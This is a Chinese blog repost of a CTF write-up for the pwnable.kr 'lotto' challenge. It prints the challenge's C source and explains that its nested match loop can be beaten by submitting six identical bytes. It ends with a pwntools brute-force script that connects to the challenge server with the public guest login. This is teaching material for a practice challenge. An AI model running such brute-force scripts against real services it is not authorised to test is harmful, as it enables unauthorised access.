欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

pwnable.kr-lotto WP

程序员文章站 2022-03-09 22:37:09
...

源码如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

unsigned char submit[6];

void play(){
	
	int i;
	printf("Submit your 6 lotto bytes : ");
	fflush(stdout);

	int r;
	r = read(0, submit, 6);

	printf("Lotto Start!\n");
	//sleep(1);

	// generate lotto numbers
	int fd = open("/dev/urandom", O_RDONLY);
	if(fd==-1){
		printf("error. tell admin\n");
		exit(-1);
	}
	unsigned char lotto[6];
	if(read(fd, lotto, 6) != 6){
		printf("error2. tell admin\n");
		exit(-1);
	}
	for(i=0; i<6; i++){
		lotto[i] = (lotto[i] % 45) + 1;		// 1 ~ 45
	}
	close(fd);
	
	// calculate lotto score
	int match = 0, j = 0;
	for(i=0; i<6; i++){
		for(j=0; j<6; j++){
			if(lotto[i] == submit[j]){
				match++;
			}
		}
	}

	// win!
	if(match == 6){
		system("/bin/cat flag");
	}
	else{
		printf("bad luck...\n");
	}

}

void help(){
	printf("- nLotto Rule -\n");
	printf("nlotto is consisted with 6 random natural numbers less than 46\n");
	printf("your goal is to match lotto numbers as many as you can\n");
	printf("if you win lottery for *1st place*, you will get reward\n");
	printf("for more details, follow the link below\n");
	printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
	printf("mathematical chance to win this game is known to be 1/8145060.\n");
}

int main(int argc, char* argv[]){

	// menu
	unsigned int menu;

	while(1){

		printf("- Select Menu -\n");
		printf("1. Play Lotto\n");
		printf("2. Help\n");
		printf("3. Exit\n");

		scanf("%d", &menu);

		switch(menu){
			case 1:
				play();
				break;
			case 2:
				help();
				break;
			case 3:
				printf("bye\n");
				return 0;
			default:
				printf("invalid menu\n");
				break;
		}
	}
	return 0;
}

主要看play()函数,从标准输入中读取6个字符submit,从/dev/urandom读取6个字符lotto,然后对lotto的进行处理,使其每个字符的ascii码小于46,然后让lottosubmit进行匹配,如果匹配成功的次数为6时,就能得到flag。

/dev/random/dev/urandom是Linux系统中提供的随机伪设备,这两个设备的任务,是提供永不为空的随机字节数据流。很多解密程序与安全应用程序(如SSH Keys,SSL Keys等)需要它们提供的随机数据流。

由于lotto是随机产生的,所以想要令submit等于lotto是极其困难的,但是观察到匹配的语句

	for(i=0; i<6; i++){
		for(j=0; j<6; j++){
			if(lotto[i] == submit[j]){
				match++;
			}
		}
	}

是两个for循环,相等于匹配36次,如果你输入6个一样的字符或者数字,并且lotto中有一个字符能恰好匹配上,也能达到match等于6的目的,也许一次不能够,但是多执行几次肯定能碰出来,毕竟lotto的范围限制在了1~45。脚本如下

from pwn import *

context.log_level = 'debug'

conn = ssh('lotto','pwnable.kr',2222,'guest')

lotto = conn.process('/home/lotto/lotto')

while True:
		lotto.recvuntil('3. Exit')

		lotto.sendline('1')

		lotto.recvuntil('Submit your 6 lotto bytes')

		lotto.sendline('\x01'*6)

		lotto.recvuntil('bad luck')

pwnable.kr-lotto WP

上一篇: Oracle 透明数据加密--表空间加密

下一篇: b站怎么拍摄柠檬头特效视频? bilibili视频特效的使用方法

推荐阅读